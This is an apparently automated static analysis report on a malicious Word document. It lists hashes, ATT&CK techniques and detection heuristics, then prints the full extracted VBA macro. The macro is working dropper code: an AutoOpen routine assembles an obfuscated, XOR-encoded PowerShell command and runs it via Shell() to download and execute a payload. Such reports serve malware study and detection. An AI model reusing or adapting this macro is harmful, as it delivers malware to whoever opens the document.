Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e34d95c9710f6a32…

MALICIOUS

Office (OLE)

Size: 112.5 KB
Created: 2018-06-19 17:50:00
Authoring application: Microsoft Office Word
First seen: 2018-07-04
MD5: 79d8f9539098be9523f69aef82596ea0
SHA-1: bfc3a43e704d1825a15b3dac3e8e05a75c072499
SHA-256: e34d95c9710f6a32294df9f2d4ae60766320faba0f1eab04cb631abdda3aa7df
Risk score: 210

Malware Insights

MITRE ATT&CK
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function that uses the Shell() function. The macro assembles a PowerShell command from obfuscated string fragments and executes it. The command is designed to download content from a specific URL and execute it, indicating downloader or dropper functionality. The ClamAV detection also confirms its malicious nature.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6584815-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6584815-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
    Matched lines in script:
      WIQCq = 55975
      jzXGhi = IboOdBIi + Shell(dGWzuwS + ulUGGiLqhPb + nlPnWb, 96108 - 96108)
      zwNZNZ = CDate(MliVc + Sin(82545 + 92193) * 49188 * CInt(91775))
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched lines in script:
      End Function
      Sub AutoOpen()
      On Error Resume Next
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10973 bytes
SHA-256: 29bb6ad5435df5dca1bcc4fd334367bbe083c7bfee20b04e90ad8e58a141abc9

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "PXoQzwzwoUU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "rAfOKTEGsIbEbr"
Function wUDzFVOAv()
On Error Resume Next
VUBHK = CDate(89433)
Efiwpp = CDate(QJKOC + Sin(32927 + 36308) * 69077 * CInt(84378))
BcpKDz = 36476
TArwjE = tNTjH
DtDXZt = 74576
YVPCBl = CByte(FkWYc)
HbAdiC = "Ow" + "erSHe" + "ll .( $PSHome[2" + "1]+$pSHOme[30" + "]+'X')( " + Chr(34) + " $" + "(SeT-varIAble" + " 'ofS' '') " + Chr(34) + "+[s"
iEbVhI = CDate(42375)
Vzutq = CDate(YGoUv + Sin(70282 + 60190) * 94470 * CInt(46183))
NLXBv = 48478
dvfbP = AYBSIM
pptZRl = 42789
VLplc = CByte(nJCwX)
TzzwPYjBLS = "Tring]( '29&" + "125" + "&110{104&111t1" + "05t25-4&25-" + "87%92%78" + "-20t86%91B83%92" + "K90-77}25<75%"
rXwLV = CDate(97905)
CKNLBk = CDate(AHoiOS + Sin(39029 + 28124) * 44412 * CInt(52960))
wuXnj = 39842
LzDPfZ = XvFXab
VCBci = 41860
DnvhjZ = CByte(mdurmw)
qFToFqsI = "88-87<93t8" + "6-84t2<29{8" + "6}114{73t87t" + "11"
obdjMX = CDate(86734)
SmpFB = CDate(mRtZQ + Sin(55256 + 82806) * 88728 * CInt(56232))
pLlVFJ = 44420
GwBUa = zuKAA
HpsldP = 67525
BcAUfK = CByte(cmfnL)
zkRiwuMB = "6<74z2" + "5K4%25{87" + "}92{78%20}8" + "6{91B83K92K90" + "-77%2" + "5<106{64&74&77" + "K9" + "2-84t23t"
ouvBV = CDate(3490)
Ejiwb = CDate(mKqSN + Sin(10783 + 30450) * 44700 * CInt(84043))
LPdoOK = 85207
bMGmA = cQFZj
QTcTN = 99367
Winuz = CByte(aQVYq)
DzIGq = "119B92<77%23K11" + "0<92{91&1" + "22&85<80B92" + "t87t77t2" + "<29&79z87&83" + "-126K109" + "<76t25K4z25z30" + "<81<77{77z73}3z" + "22%22t78z78%"
wUDzFVOAv = HbAdiC + TzzwPYjBLS + qFToFqsI + zkRiwuMB + DzIGq
End Function
Function tvFVBjk()
On Error Resume Next
EOtBil = CDate(88704)
pusQj = CDate(frAWb + Sin(6970 + 59412) * 57065 * CInt(14098))
YrjMjK = 93075
zAEtzn = zpzUd
KEZCMI = 28119
wISafz = CByte(ToOPK)
iEcoJXziGED = "78-23}93t9" + "0K20t77<92&90" + "z81t" + "23-75{76}22{10" + "5}8B85"
mzCApS = CDate(4549)
SUsMp = CDate(ZBXzL + Sin(20332 + 65567) * 73372 * CInt(86662))
Kvirco = 85139
kIarB = GYjjJf
bwalFs = 11607
GLaHGB = CByte(hAXCqu)
WOpBU = "t67" + "-120" + "<114-" + "22-121K81B77}" + "77z73&3{2" + "2}22<78B7"
UjGuu = CDate(24382)
AlZctn = CDate(pwAkD + Sin(79710 + 6391) * 89289 * CInt(92642))
uMZHw = 99684
JZIKSi = GPruOG
MlDCsK = 31793
ijsAG = CByte(QjrKzd)
bPijD = "8t78-23" + "<93z92&87&80{" + "67{92<84{8" + "5&88t82<9&15z" + "23{90{86t84}22" + "K13{92z77}" + "83{105z65t105{2" + "2<121B81t"
dvMap = CDate(41147)
RlABl = CDate(CGijh + Sin(83399 + 1552) * 18764 * CInt(54591))
SZbkr = 49771
Viqtqh = UpLud
NAuVC = 59417
nLZjPl = CByte(ElhCw)
jpEPTihMt = "77t77&73" + "B3B22" + "<22{78%78t78&23" + "<8" + "0%80{90B74B93" + "-92<8" + "5t81}80K23<86z" + "75<94t22" + "&65" + "&93%110t64&"
jSfMaf = CDate(47930)
VinVwi = CDate(VzjALb + Sin(23793 + 32235) * 40075 * CInt(57830))
KXwqi = 29980
hcIWE = uVvifL
KJhAS = 25128
BALwM = CByte(Orwwb)
jMqiAUfV = "124z" + "113B2" + "2-121t81z" + "77" + "B77" + "t73z3<22&22K78B" + "78z78<23K82&7"
bdjrql = CDate(16954)
BuMzHo = CDate(zCPco + Sin(94902 + 57505) * 30078 * CInt(46029))
zhattP = 97391
UdLNNH = oWOVw
CIGJOL = 21673
FXCKi = CByte(zwZwi)
KwicNGaUzd = "7-88%94-81" + "}88" + "K8" + "7%88-23K" + "90z86K84&" + "22t87%64}" + "110%9{10" + "4K22z12" + "1B81B77K" + "77K"
KJlZsB = CDate(37189)
UhnPE = CDate(cRjMO + Sin(38249 + 93322) * 61475 * CInt(95851))
Cuwwt = 20223
RHmYjA = haXBu
UFwaz = 3546
qtzNL = CByte(WHzcn)
Nqiojd = "73t3" + "K22K22B78t78t78" + "t23B94{76-75t7" + "6B88-87}9" + "3%9" + "0%86<23}8" + "0K87<22"
TYGojL = CDate(65244)
OGRtw = CDate(pWjwnq + Sin(53834 + 55070) * 45849 * CInt(37719))
FiJzi = 8575
hWiHM = hfRij
ucnADJ = 58667
lNUqi = CByte(JHkPu)
YQOZDjj = "<9-83-94" + "}94B91-85" + "{111B22{30" + "z23t106}73&8" + "5%80}77"
hvFXo = CDate(40989)
pYTtYj = CDate(WLVoiG + Sin(51464 + 24304) * 84448 * CInt(67239))
arAWmY = 74538
NdwAL = sLMKE
OjRbO = 62444
EEqAnh = CByte(ozsBlk)
pAuRlFUGTH = "t17%30z121}" + "30B16z2}" + "29}88K91B11" + "1K9" + "0-67-88&25" + "%4&25<29-1"
MLAMTf = CDate(35212)
GEQiMj = CDate(bwMSj + Sin(25927 + 76179) * 88148 * CInt(79032))
HPAKR = 75794
ZoAuCI = aZTLG
jfzsR = 18030
NDinV = CByte(WMbrB)
rcRJlr = "25%110" + "K104K111%105{23" + "K87K92K" + "65%77<17-8%" + "21}25&12-1"
tvFVBjk = iEcoJXziGED + WOpBU + bPijD + jpEPTihMt + jMqiAUfV + KwicNGaUzd + Nqiojd + YQOZDjj + pAuRlFUGTH + rcRJlr
End Function
Function QlwpZSNnCq()
On Error Resume Next
DmMJUu = CDate(60742)
hUWkCh = CDate(zRznsA + Sin(12026 + 96183) * 89640 * CInt(87512))
zbpjvP = 29665
WloisO = vwocZ
VjlmGD = 64486
UbZRL = CByte(uqRADw)
fNTZziMXok = "1K14}10t8<11K16" + "%2{29<" + "79K83<96K" + "75B116<25}4}25" + "%29" + "{92<87z79t3}77B" + "92t84K73-25" + "t18-25B30"
XGlJX = CDate(84199)
SIPTr = CDate(LmXpwi + Sin(83324 + 97330) * 19060 * CInt(9242))
wwqzA = 30459
AKKBzq = nivKCN
THczub = 58125
qzoRP = CByte(Xtwzc)
Wzmaw = "-101%30t25}" + "18B25<" + "29%" + "88z91}111K9" + "0%67t88z"
BjJBfa = CDate(29354)
PdUDk = CDate(OwllW + Sin(85865 + 74286) * 94331 * CInt(2058))
aDnAEA = 32467
fGaEdb = wjiBDq
VqWIz = 47253
INBmIM = CByte(XUScfN)
DEErTrj = "25t1" + "8-2" + "5{" + "30<23t92z65" + "}92{" + "30K2t95t8" + "6%75t92<88"
VTGEKG = CDate(66116)
jWizc = CDate(ZiAvF + Sin(89831 + 13837) * 79073 * CInt(29022))
FcaJX = 63557
zVIhz = LkKuwl
VwRwb = 55611
JUJEii = CByte(YAKXn)
izXMPwko = "&90z81-" + "17" + "K29t1" + "06z116-"
tpiMn = CDate(16866)
wnwfMQ = CDate(sPjkDq + Sin(93040 + 35636) * 33012 * CInt(43750))
iFFZwt = 7
hlOJU = JmnkQX
IkVSi = 94107
SsXjE = CByte(HozBSp)
zMjwMqqPQmH = "77}97B78t2" + "5<80K87{25K29" + "&79K87B" + "83&126-109t76{1" + "6B66&77}75t64}"
ZdFbs = CDate(41555)
TUioUf = CDate(tqwkFj + Sin(89600 + 75567) * 46794 * CInt(18310))
UnuPYO = 32027
LRBNFf = wVvJp
jsovik = 74897
zObXL = CByte(GXQnTw)
JOiirfTK = "66-" + "29%86t11" + "4{73t87<116}" + "74%23{12"
VJAkBK = CDate(9306)
szInW = CDate(iQofnd + Sin(92392 + 62129) * 87203 * CInt(17827))
jAMhR = 4007
tEzoN = PlIhWA
jGzBZc = 56974
RblFv = CByte(hEaGPz)
iKinpJRN = "5}86t7" + "8t87}85K86<88<" + "93z12" + "7B80t85<9" + "2-17{29{10"
CNGIQL = CDate(99388)
fuGQfm = CDate(JwAcO + Sin(77493 + 29868) * 51177 * CInt(84722))
ZuCnl = 50876
JwYAr = vSkPLn
XZauqn = 67377
VipQqj = CByte(GFYiK)
XsGAqoMkWr = "6}116K" + "77<97{78" + "-23z109-86-10" + "6%7" + "7K7" + "5B" + "80{87t94%"
QlwpZSNnCq = fNTZziMXok + Wzmaw + DEErTrj + izXMPwko + zMjwMqqPQmH + JOiirfTK + iKinpJRN + XsGAqoMkWr
End Function
Function jFkCK()
On Error Resume Next
uWIWCd = CDate(4802)
uZnJGw = CDate(kDiFt + Sin(44132 + 62719) * 55216 * CInt(46696))
LunwJX = 4027
sRKzN = WXBQX
aGuzHK = 25771
EmnOBG = CByte(bjoRL)
wCWijIbacp = "17t16&21-25{" + "29}7" + "9%83{96-75K116" + "<16{2}10" + "6z77%88&7" + "5z77z20z10" + "5t75%86z90t92" + "t74<74-25%29&" + "79B" + "83B96"
QlFhf = CDate(10186)
cLtPWP = CDate(SzIzI + Sin(69105 + 91775) * 19785 * CInt(11109))
FvIMq = 56388
Cdudwi = TdpjU
ahlAiA = 46779
LRbOt = CByte(zKLsoj)
RqpXqpfz = "}75{116}2<91z75" + "%92" + "&88{" + "82K2&6" + "8-90%" + "88-77{90K" + "81<66{78%75" + "-80<77z92&2" + "0{81{86B74" + "&77t25}29<102"
sZpwHh = CDate(29956)
jRJhO = CDate(wiwjf + Sin(24231 + 74744) * 62525 * CInt(26620))
riMiM = 6452
pKvjbA = XmPwFX
FVfJNK = 94297
jwbGff = CByte(BKAfcm)
cbcDnzAQE = "t23<124" + "B65B" + "90<9" + "2&73<7" + "7{80z86B87-23-" + "116B92K74" + "&74"
wMtLRi = CDate(18284)
dTDfrt = CDate(dzwBaM + Sin(12181 + 73768) * 87265 * CInt(20251))
RUCbBw = 95411
IjvOd = LCSHJQ
SosjtI = 63863
JMLMI = CByte(ljvjTl)
VcUhMmH = "B88t94}92-2-68" + "&68" + "'.spLIt( '}%" + "-{Ktz" + "B&<' ) |ForeAch" + " { ["
obTTj = CDate(27797)
mUatld = CDate(FZpSr + Sin(47432 + 99486) * 37760 * CInt(51208))
DJGvl = 34543
IOpwOG = DvNdc
mMXiZO = 34116
jsZAB = CByte(VZlPqN)
NotMmaI = "ChaR] ( $_-BX" + "or'0x39' )} )+" + Chr(34) + "$( set-it" + "eM  'Vari" + "ABLe:ofs" + "'  ' '" + ") " + Chr(34) + ")"
jFkCK = wCWijIbacp + RqpXqpfz + cbcDnzAQE + VcUhMmH + NotMmaI
End Function

Function LValKNn()
On Error Resume Next
BfbOW = CDate(YDALVj + Sin(77428 + 84824) * 98119 * CInt(33791))
Ptrdwu = CByte(rkRdY)
JCplj = CDate(45388)
bIwskU = OZpsw
BBIqYH = 23795
Epjsm = 68761
GfzvFP = CDate(zVDdf + Sin(87458 + 91829) * 27750 * CInt(40070))
vtkOK = CByte(NJbYbQ)
RzzEj = CDate(8567)
aiNEuN = QVXzd
dGEVM = 82326
ApIIR = 30600
liwbB = CDate(ncrGq + Sin(29504 + 38784) * 97094 * CInt(15198))
wXQDiH = CByte(zqdMSo)
jrAWLD = CDate(77524)
wBWrRi = zEJZD
oJukNo = 45485
rcUHZm = 72575
zdWIuM = CDate(suuKh + Sin(6202 + 85723) * 98844 * CInt(42596))
bZLlj = CByte(XKjwF)
YAWrs = CDate(69964)
woUjUS = KUjMDh
DGLJO = 73863
TZWnc = 11024
IhFWQN = CDate(PGVrBR + Sin(90629 + 36014) * 36032 * CInt(75450))
PBNZi = CByte(tDQLiL)
zZfJoM = CDate(60476)
rUQJK = RXTqs
QYNLc = 31581
XPkfH = 40173
End Function
Function pVumBFjXmdo()
On Error Resume Next
wbQmo = CDate(KkLOIc + Sin(98999 + 39548) * 40092 * CInt(14609))
nJQCHN = CByte(PVKaz)
zFtuq = CDate(43473)
RjfhH = aEIwLz
COcMo = 18462
iWRGr = 22760
kDXVUvWH = bNZIKd + Chr(aiaPBozi + 80 + ViJRYsrEAai)
KscJOb = CDate(adwEm + Sin(46911 + 13373) * 16159 * CInt(94010))
zzBcz = CByte(cGqVqh)
hjzznq = CDate(61485)
ziFPal = iCziJ
iOJClD = 14130
wNbPm = 13167
zqLITB = CDate(PQXfj + Sin(24535 + 23956) * 29982 * CInt(68018))
muRaX = CByte(QnIaW)
HbiLiU = CDate(32119)
WKHmKF = sCzwo
TjKaf = 26476
jFPnb = 90596
pVumBFjXmdo = UArrs + kDXVUvWH + wUDzFVOAv + tvFVBjk + QlwpZSNnCq + jFkCK
ZUZkUz = CDate(QodlnU + Sin(12117 + 10195) * 59262 * CInt(9385))
nXuLva = CByte(JJnml)
PRBZb = CDate(85148)
tzYwGz = JZtpUE
JGWiBX = 70511
ftUTwJ = 82643
End Function
Function LPPUZa(ulUGGiLqhPb)
On Error Resume Next
ljuvzz = CDate(bazpsV + Sin(66674 + 4577) * 44394 * CInt(33655))
Kmzni = CByte(SdNZvL)
ibUYLH = CDate(52162)
karFZO = VPPzHr
wrUfCz = 32855
pSYGCr = 70318
KvVZH = CDate(ppRzHN + Sin(30650 + 29297) * 82630 * CInt(4301))
ZzGTX = CByte(tjGjP)
jRbSFw = CDate(4624)
YUpYr = VbILUZ
lBnbGS = 9929
WIQCq = 55975
jzXGhi = IboOdBIi + Shell(dGWzuwS + ulUGGiLqhPb + nlPnWb, 96108 - 96108)
zwNZNZ = CDate(MliVc + Sin(82545 + 92193) * 49188 * CInt(91775))
CMUaZ = CByte(hiMdS)
zzzcUQ = CDate(93024)
uzDoiD = YhcjM
jLiLDP = 17159
qnShZ = 10405
End Function
Sub AutoOpen()
On Error Resume Next
KJWUww = CDate(zFUlUP + Sin(66991 + 53639) * 47752 * CInt(20747))
pFDYD = CByte(aQsmVt)
BjwkAf = CDate(75555)
UQWZu = LKufD
vMAwUs = 66665
TNvbi = 91456
Application.Run tuLpbcnD + "LPPUZa" + izCXbEOTVF, czXOnj + pVumBFjXmdo + TwSkmA
ZoDjr = CDate(CfZGm + Sin(54667 + 39009) * 75070 * CInt(71474))
YYSEYZ = CByte(LWKkOS)
mBCwr = CDate(1037)
afncBY = ujPvU
EGprQn = 35020
pUvRLz = 69587
End Sub